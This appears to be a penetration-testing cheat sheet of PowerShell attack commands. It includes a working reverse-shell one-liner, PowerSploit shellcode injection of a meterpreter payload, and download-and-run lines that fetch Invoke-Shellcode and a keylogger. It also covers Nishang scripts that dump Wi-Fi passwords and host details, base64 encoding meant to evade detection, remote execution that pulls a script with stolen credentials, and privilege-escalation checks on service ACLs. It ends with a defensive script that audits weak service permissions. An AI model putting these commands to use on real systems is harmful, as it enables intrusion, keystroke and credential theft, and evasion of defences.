PowerShell

Reverse Shell One liner

$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

PowerSploit

Invoke-Shellcode

You have admin credentials and already have a shell on the target machine.

Start-Process C:\Windows\SysWOW64\notepad.exe -WindowStyle Hidden

$Proc = Get-Process notepad

Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost <ip> -Lport 443 -Verbose

# Or, in memory

IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.10.10 -Lport 443 -Force

Invoke-WmiMethod

To connect remotely to another Windows system and execute a base64-encoded command string on a specific port.

Invoke-WmiMethod -Class Win32_Process -Name create -ArgumentList "powershell.exe -enc [Base64 encoded string]" -ComputerName [victim IP] -Credential [Username]

Get-Keystrokes

powershell.exe

IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

Get-Keystrokes -LogPath C:\key.log -CollectionInterval 1

Exfiltration/Out-Minidump.ps1 (dump memory from a process)

Exfiltration/Get-TimedScreenshot.ps1 (take a screenshot of the victim's computer)

Nishang

Get-Information.ps1

Pulls information from the PowerShell environment: PuTTY sessions, recently used commands, shares, environment variables, SNMP info, installed applications, domain information, user information, system information and wireless information.

powershell -ExecutionPolicy bypass -file Get-Information.ps1

Get-WLAN-Keys.ps1

Dumps all of the user's saved Wi-Fi profiles together with their stored settings, including the SSID and password.

.\Get-WLAN-Keys.ps1

StartListener.py

Use with PowerSploit reverse shells. It sets up a listener and can migrate into a process when a target connects to it.

python ./StartListener.py [Host IP] 443

Ps_encoder.py

Encodes PowerShell commands as base64 to avoid detection.

echo "IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.10.10 -Lport 443 -Force" > raw.txt

./ps_encoder.py -s raw.txt

Get System Release ID

(Get-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion").GetValue('ReleaseID')

Executing Command as Another User

You have a user's credentials but cannot log on to the machine as that user; all you have is a service shell.

$pass = ConvertTo-SecureString '<passwd>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('.\hector', $pass)
Invoke-Command -ComputerName <computer-name> -Credential $cred -ScriptBlock { IEX(New-Object Net.WebClient).DownloadString('http://10.101.0.10/rs.ps1') }

Get User ACL

# user ACL on a registry key: read the key's security descriptor, then expand its DACL
$acl = Get-Acl -Path 'HKLM:\<key-path>'
ConvertFrom-SddlString -Sddl $acl.Sddl -Type RegistryRights | ForEach-Object { $_.DiscretionaryAcl }

Go into Registry Mode

cd HKLM:

cd SYSTEM\CurrentControlSet\Services

# dump all services
gci

# get all service properties
$services = Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\*

# get the child name and count; ObjectName shows the account each service runs as. If you can manipulate a service, look for those running as SYSTEM
$services | Select-Object PSChildName, ObjectName | Measure-Object

$services | where { ($_.ObjectName -match 'LocalSystem') }

# and find those whose Start value is 3, which means manual start
$services | where { ($_.ObjectName -match 'LocalSystem') -and ($_.Start -eq 3) }

# check the security descriptor of a service from PowerShell (sc alone is the Set-Content alias, so go through cmd)
cmd /c sc sdshow wuauserv

# then
ConvertFrom-SddlString -Sddl "sddl from last command" | Foreach-Object {$_.DiscretionaryAcl}

# list all services that Authenticated Users (AU) are allowed to start (RP right in the SDDL)
$serviceNames = (Get-Service).Name
foreach ($service in $serviceNames) { $sddl = (cmd /c sc sdshow $service) -join ''; if ($sddl -match 'RP[A-Z]*?;;;AU') { $service } }
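As an added example (not from the original page or from any of the tools above), a least-privilege audit that does what the last loop attempts more carefully: it parses the DACL part of the SDDL string printed by `sc.exe sdshow` ACE by ACE and reports services where broad principals (Authenticated Users, Everyone, Users, Interactive, Anonymous) hold start, stop, reconfigure, delete or write-DAC rights, so those services can be locked down before someone else finds them. The function names and the sample SDDL are constructed.

```powershell
# Service-specific access rights as they appear in SDDL (two-letter codes).
# Generic rights (GA/GW) are included because they imply the specific ones.
$RiskyRights = @{
    'RP' = 'Start'; 'WP' = 'Stop'; 'DC' = 'ChangeConfig'; 'SD' = 'Delete'
    'WD' = 'WriteDac'; 'WO' = 'WriteOwner'; 'GA' = 'GenericAll'; 'GW' = 'GenericWrite'
}
# Well-known SID aliases that mean "more or less anyone who can log on".
$BroadPrincipals = @{
    'AU' = 'Authenticated Users'; 'WD' = 'Everyone'; 'BU' = 'Users'
    'IU' = 'Interactive'; 'AN' = 'Anonymous'
}

function Get-WeakServiceAce {
    # Returns one object per allow-ACE in the DACL that grants a risky right to a
    # broad principal. Letter-coded masks are decoded; a hex mask (e.g. 0x1f01ff)
    # is reported as-is so it can be reviewed by hand.
    param([Parameter(Mandatory)][string]$Sddl)
    if (-not ($Sddl -match 'D:(?<dacl>(?:\([^)]*\))+)')) { return }
    $aceRegex = '\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)'
    foreach ($ace in [regex]::Matches($Matches.dacl, $aceRegex)) {
        $type = $ace.Groups[1].Value; $mask = $ace.Groups[3].Value; $sid = $ace.Groups[6].Value
        if ($type -ne 'A' -or -not $BroadPrincipals.ContainsKey($sid)) { continue }
        if ($mask -like '0x*') { $granted = @("mask $mask (review manually)") }
        else {
            # The mask is a run of two-letter codes; keep the risky ones. 'WD' in this
            # field is the WriteDac right, not the Everyone SID: same letters, different field.
            $codes = for ($i = 0; $i + 1 -lt $mask.Length; $i += 2) { $mask.Substring($i, 2) }
            $granted = @($codes | Where-Object { $RiskyRights.ContainsKey($_) } | ForEach-Object { $RiskyRights[$_] })
        }
        if ($granted.Count -gt 0) {
            [pscustomobject]@{ Principal = $BroadPrincipals[$sid]; Sid = $sid; Rights = ($granted -join ',') }
        }
    }
}

function Find-WeakServiceAcl {
    # Runs the check across every installed service (sc.exe, because sc alone is Set-Content).
    foreach ($svc in Get-Service) {
        $sddl = (sc.exe sdshow $svc.Name | Where-Object { $_ -match '^D:' }) -join ''
        foreach ($w in Get-WeakServiceAce -Sddl $sddl) {
            [pscustomobject]@{ Service = $svc.Name; Principal = $w.Principal; Rights = $w.Rights }
        }
    }
}

# Constructed sample descriptor: the AU entry carries RP (Start), while the 'WD'
# inside the BA entry is WriteDac for Administrators and is correctly not a broad principal.
$SampleSddl = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPLOCRRC;;;AU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
Get-WeakServiceAce -Sddl $SampleSddl | Format-Table
```

Run `Find-WeakServiceAcl | Format-Table` on a host to get the full list; anything it reports is a candidate for tightening with `sc.exe sdset` or via Group Policy.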